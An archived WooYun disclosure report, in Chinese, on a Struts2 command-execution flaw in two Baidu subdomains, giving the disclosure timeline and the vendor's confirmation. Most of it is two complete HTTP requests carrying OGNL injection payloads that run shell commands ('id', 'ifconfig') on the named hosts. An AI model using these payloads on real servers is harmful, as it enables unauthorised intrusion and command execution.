乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
st2命令执行
又找到2个,同 WooYun: 百度某站st2命令执行(独特执行姿势)
http://wangdan.baidu.com/netorderimport/onlineApplication.actionhttp://yingxiao.baidu.com/zhichi/welcome.action
POST http://yingxiao.baidu.com/zhichi/welcome.action HTTP/1.1User-Agent: curl/7.33.0Host: wangdan.baidu.comAccept: */*Proxy-Connection: Keep-AliveContent-Length: 414Content-Type: multipart/form-data; boundary=------------------------8102ab1e697452a5--------------------------8102ab1e697452a5Content-Disposition: form-data; name="redirect:/${#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(new java.io.InputStreamReader(new java.lang.ProcessBuilder({'sh','-c','id'}).start().getInputStream()))}"1--------------------------8102ab1e697452a5--
POST http://wangdan.baidu.com/netorderimport/onlineApplication.action HTTP/1.1User-Agent: curl/7.33.0Host: wangdan.baidu.comAccept: */*Proxy-Connection: Keep-AliveContent-Length: 420Content-Type: multipart/form-data; boundary=------------------------8102ab1e697452a5--------------------------8102ab1e697452a5Content-Disposition: form-data; name="redirect:/${#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(new java.io.InputStreamReader(new java.lang.ProcessBuilder({'sh','-c','ifconfig'}).start().getInputStream()))}"1--------------------------8102ab1e697452a5--
.
危害等级:高
漏洞Rank:20
确认时间:2015-10-19 17:24
感谢关注百度安全
暂无